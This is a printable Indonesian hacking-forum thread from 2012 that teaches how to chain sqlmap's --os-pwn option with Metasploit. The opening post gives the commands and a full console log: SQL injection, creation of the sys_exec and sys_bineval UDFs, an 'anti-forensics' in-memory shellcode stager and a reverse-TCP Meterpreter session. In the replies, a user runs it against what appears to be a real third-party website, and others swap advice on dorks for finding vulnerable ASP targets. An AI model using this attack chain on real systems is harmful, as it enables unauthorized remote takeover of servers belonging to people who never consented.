Indonesian Back|Track Team
Integrasi SQLMAP dengan METASPLOIT - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html)
+---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html)
+---- Thread: Integrasi SQLMAP dengan METASPLOIT (/thread-4127.html)

Pages: 1 2

Integrasi SQLMAP dengan METASPLOIT - zee eichel - 12-06-2012

sebagai framework , metasploit memiliki kemampuan untuk terintegrasi dengan berbagai tools lainnya .. sebagai contoh kli ini saya akan mengintegrasikan metasploit dengan sqlmap , tools analisis kerentanan pada database sql :-bd

Untuk tutorial mengenai sqlmap .. dapat anda lihat di

http://indonesianbacktrack.or.id/forum/search.php?action=results&sid=f0fdce9f5e744ca3b7a346873a5a69df&sortby=&order=desc

Code:
root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://localhost.com/example.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

Untuk saat ini , maaf saya memakai dracos linux sebagai contoh ...dapat anda sesuaikan dengan os pentest anda

Code:
root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://situs-target.com/pagevulner.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

some shit for a walker area ...

[shcode=bash][INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[12:9:13] [INFO] fingerprinting the back-end DBMS operating system
[12:9:15] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[16:10:05] [INFO] testing if current user is DBA
[12:10:15] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[12:10:07] [INFO] checking if UDF 'sys_bineval' already exist
[12:10:08] [INFO] checking if UDF 'sys_exec' already exist
[12:10:10] [INFO] detecting back-end DBMS version from its banner
[12:10:12] [INFO] retrieving MySQL base directory absolute path
[12:10:13] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[12:10:15] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:29] [INFO] creating Metasploit Framework 3 multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [xxx.xxx.xxx.xxx]
which local port number do you want to use? [555]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[12:10:15] [INFO] creation in progress ... done
[12:10:16] [INFO] running Metasploit Framework 3 command line interface locally, please wait..

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12655 updated today (2012.12.06)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 555
LHOST => xxx.xxx.xxx.xxx
[*] Started reverse handler on xxx.xxx.xxx.xxx:555
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval',
please wait..
[*] Sending stage (749056 bytes) to xxx.xxx.xxx.xxx
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:9128 -> xxx.xxx.xxx.xxx:555) at Thu Dec 06[/shcode]

meterpreter pun terbuka ..


RE: Integrasi SQLMAP dengan METASPLOIT - ardian - 12-06-2012

mantap om zee.. ane kasih thank ni,,hehehhe

RE: Integrasi SQLMAP dengan METASPLOIT - Clound_Carbelius - 12-06-2012

ane kurang ngerti om Sad( Sad(
om om, \m/
ane jalanin ini
Quote:./sqlmap.py -u "http://www.schubertensemble.com/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

kluar pertanyaan kaya di gambar ini
[Image: 55mgci.png]

trus gak kluar Msf nya Undecided

RE: Integrasi SQLMAP dengan METASPLOIT - czeroo_cool - 12-06-2012

(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: ane kurang ngerti om Sad( Sad(
om om, \m/
ane jalanin ini
Quote:./sqlmap.py -u "/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

kluar pertanyaan kaya di gambar ini


trus gak kluar Msf nya Undecided


Kelihatannya itu document file website mu kurang tepat clound, :d


RE: Integrasi SQLMAP dengan METASPLOIT - Clound_Carbelius - 12-06-2012

(12-06-2012, 05:45 PM)czeroo_cool Wrote:
(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: om om, \m/
ane jalanin ini
Quote:./sqlmap.py -u "/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

kluar pertanyaan kaya di gambar ini


trus gak kluar Msf nya Undecided


Kelihatannya itu document file website mu kurang tepat clound, :d

eem bgitu :-bd
ane bagi Dork om donk :d :-?

RE: Integrasi SQLMAP dengan METASPLOIT - zee eichel - 12-06-2012

yang kurang adalah path metasploit om salah tuh .. emang pathnya itu ?

RE: Integrasi SQLMAP dengan METASPLOIT - czeroo_cool - 12-06-2012

(12-06-2012, 05:57 PM)zee eichel Wrote: yang kurang adalah path metasploit om salah tuh .. emang pathnya itu ?

Bisa aja di ganti Folder nya Big Grin

@Clound ... Cari dork nya yang ASP aja om..

RE: Integrasi SQLMAP dengan METASPLOIT - koecroet - 12-06-2012

(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: ane kurang ngerti om Sad( Sad(
om om, \m/
ane jalanin ini
Quote:./sqlmap.py -u "/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

kluar pertanyaan kaya di gambar ini


trus gak kluar Msf nya Undecided

itu karna target ente linux, trus salah masukin letak folder deh ente spertinya. ente harus tau letak direktori dari website victim di filesystem, kalo di linux default nya kan di "/var/www/" tuh

RE: Integrasi SQLMAP dengan METASPLOIT - [H2] - 12-06-2012

wiiihhh, keren nih om..
trus kalo mau nyari tables, colom and dump gimana, masih samakah perintah nya seperti sqlmap...???

RE: Integrasi SQLMAP dengan METASPLOIT - cyberking - 12-07-2012

wkwkw alhamdulillah dapat ilmu lgi Big Grin